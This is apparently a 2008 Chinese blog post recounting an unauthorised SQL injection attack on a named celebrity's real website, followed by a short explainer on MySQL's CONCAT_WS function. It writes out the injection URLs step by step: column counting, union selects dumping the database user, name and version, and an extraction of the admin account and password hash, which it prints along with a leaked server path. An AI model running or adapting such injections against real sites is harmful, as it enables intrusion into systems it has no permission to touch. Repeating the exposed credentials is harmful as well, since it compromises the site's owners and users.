对王力宏网站的不完全检测

作者:yexusky

ps:虽然没有拿到shell,但是对php检测字段,有了一点了解

url:http://www.wangleehom.com

Blind SQL INJ :http://www.wangleehom.com/forum/view?id=5047
http://www.wangleehom.com/forum/view?id=5047 and 1=1(没有报错)
http://www.wangleehom.com/forum/view?id=5047 and 1=0 or 1=2(报错)>明显的php注入
http://www.wangleehom.com/forum/view?id=5047 order by 11 返回正常
http://www.wangleehom.com/forum/view?id=5047 order by 12 报错(Unknown column '12' in 'order clause'
SELECT * FROM forum_detail WHERE forum_id = 5047 order by 12/* ORDER BY id)
猜出来了字段为11个,go
http://www.wangleehom.com/forum/view?id=5047%20and%2...,2,3,4,5,6,7,8,9,10,11/*
返回 1,4,5,6,11然后插入在5处插入CONCAT_WS(CHAR(32,58,32),user(),database(),version())
http://www.wangleehom.com/forum/view?id=5047%20and%2...,2,3,4,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),6,7,8,9,10,11/*
返回(demo@localhost : wang_new : 4.1.22-log)
from database 检测出 (user,config)
user Tables 里有 (id,password,*)还有一项猜不出来,想了很久,试着找了下后台地址:http://www.wangleehom.com/admin/
很是容易就猜出来了,然后看下源码

(<html>
<head>
<title>Webtaiwan Website Management Suite</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<style>
input.text {
font-family: "Arial", "Helvetica", "sans-serif"; font-size: 9pt; color: #666666; height: 22px}
</style>
<script language="javascript" src="../func.js"></script>
<script language="JavaScript">
<!--
function MM_preloadImages() { //v3.0
var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_swapImgRestore() { //v3.0
var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_findObj(n, d) { //v4.0
var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
if(!x && document.getElementById) x=document.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}
//-->
</script>
<script language="javascript">
function checkLogin()
{
if (checkBlank(frm.account, '請輸入帳號!'))
return false;
if (checkBlank(frm.password, '請輸入密碼!'))
return false;
return true;
}
</script>
</head>

<body bgcolor="#FFFFFF" text="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" onLoad="MM_preloadImages('images/arrow_n.gif')">
<form name="frm" method="post" action="index.php?fn=login" style="margin:0 0 0 0;" onSubmit="return checkLogin();">
<table width="100%" border="0" cellspacing="0" cellpadding="0" height="100%">
<tr>
<td bgcolor="#DFE0E0" height="87"><img src="../images/admin/spacer.gif" width="20" height="87"></td>
</tr>
<tr>
<td bgcolor="#C0C0C0" height="1"><img src="../images/admin/spacer.gif" width="20" height="1"></td>
</tr>
<tr>
<td valign="bottom">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="161" valign="top">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td><img src="../images/admin/index_logo.gif" width="161" height="87"></td>
</tr>
<tr>
<td><img src="../images/admin/index_1.gif" width="161" height="36"></td>
</tr>
</table>
</td>
<td width="317" valign="top">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td><img src="../images/admin/index_2.gif" width="317" height="87"></td>
</tr>
<tr>
<td><img src="../images/admin/index_3.gif" width="317" height="55"></td>
</tr>
</table>
</td>
<td valign="top" width="239">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td><img src="../images/admin/index_3_coname.gif" width="239" height="100"></td>
</tr>
<tr>
<td valign="top">
<table width="100%" border="0" cellspacing="0" cellpadding="0" bgcolor="#ADADAD" height="76">
<tr>
<td align="center" colspan="2"><img src="../images/admin/spacer.gif" width="10" height="4"></td>
</tr>
<tr>
<td align="center" width="90"><img src="../images/admin/indx_username.gif" width="69" height="11"></td>
<td>
<input class="text" type="text" name="account" style="width:90px;">
</td>
</tr>
<tr>
<td align="center" width="90"><img src="../images/admin/indx_password.gif" width="69" height="11"></td>
<td>
<input class="text" type="password" name="password" style="width:90px;">
</td>
</tr>
<tr>
<td align="center" colspan="2"><img src="../images/admin/spacer.gif" width="10" height="4"></td>
</tr>
</table>
</td>
</tr>
</table>
</td>
<td valign="top">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td height="87">&nbsp;</td>
</tr>
<tr>
<td bgcolor="#3891CB"><img src="../images/admin/spacer.gif" width="20" height="7"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td colspan="4" valign="top"><img src="../images/admin/spacer.gif" width="20" height="20"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#C0C0C0" height="1"><img src="../images/admin/spacer.gif" width="20" height="1"></td>
</tr>
<tr>
<td background="../images/admin/indx_line_bg.gif" height="25"><img src="../images/admin/indx_line.gif" width="778" height="25"></td>
</tr>
<tr>
<td bgcolor="#DFE0E0" height="32"><img src="../images/admin/spacer.gif" width="20" height="32"></td>
</tr>
<tr>
<td height="96" bgcolor="#DFE0E0" valign="top">
<table width="717" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="578" align="right" class="message_error" valign="bottom"><!--error
message area, error message area, error message area, error message
area--></td>
<td width="25">&nbsp;</td>
<td valign="top">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="65"><img name="arrow" border="0" src="../images/admin/arrow_o.gif" width="65" height="25"></td>
<td><input type="image" src="../images/admin/login.gif" width="74" height="25" name="login" border="0" onLoad="" onMouseOver="MM_swapImage('arrow','','../images/admin/arrow_n.gif',1)" onMouseOut="MM_swapImage('arrow','','../images/admin/arrow_o.gif',1)"></td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table></form>
</body>
</html></script>)


查找input ,找到 <input class="text" type="text" name="account" style="width:90px;">
</td>
</tr>
<tr>
<td align="center" width="90"><img src="../images/admin/indx_password.gif" width="69" height="11"></td>
<td>
<input class="text" type="password" name="password" style="width:90px;">
一看就知道为什么username猜不出来了,原来是name="account" account 这个啊,心里有点小高兴,
http://www.wangleehom.com/forum/view?id=5047%20and%2...,2,3,4,CONCAT_WS(CHAR(32,58,32),id,account,password),6,7,8,9,10,11%20from%20user/*
得到管理用户和密码和id(1 : wangmama : 44a519446ffb8f385a6dedf9ee1fb69a

然后去www.cmd5.com 和 www.xmd5.org 都破解不出,汗,然后继续猜Tables 猜到 config 但是里面只有id(99)
然后用cookie欺骗进后台不行,没办法了,结果发现竟然把地址爆出来了(/var/www/hosts/wangleehom.com/)
哦对了load_file()什么也读不出,哭啊,最后检测出Current database 13个用户密码
好了吧检测到此

 

CONCAT_WS的用法

来源:火车头的Blog

从数据库里取N个字段,然后组合到一起用“,”分割显示,起初想到用CONCAT()来处理,好是麻烦,没想到在手册里居然有提到CONCAT_WS(),非常好用。
CONCAT_WS(separator, str1, str2,...)
它是一个特殊形式的 CONCAT()。第一个参数剩余参数间的分隔符。分隔符可以是与剩余参数一样的字符串。如果分隔符是 NULL,返回值也将为 NULL。这个函数会跳过分隔符参数后的任何 NULL 和空字符串。分隔符将被加到被连接的字符串之间
简单例子如下:

mysql> SELECT CONCAT_WS(",","First name","Second name","Last Name");
-> 'First name,Second name,Last Name'
mysql> SELECT CONCAT_WS(",","First name",NULL,"Last Name");
-> 'First name,Last Name'
 

Posted on: 2008, November 1, 4:47 PM | Filed under: 渗透实例 |
Tags:php_example

您可能会对以下文章感兴趣哦

Leave a comment

Your comment

Why not Login? Sign up now! »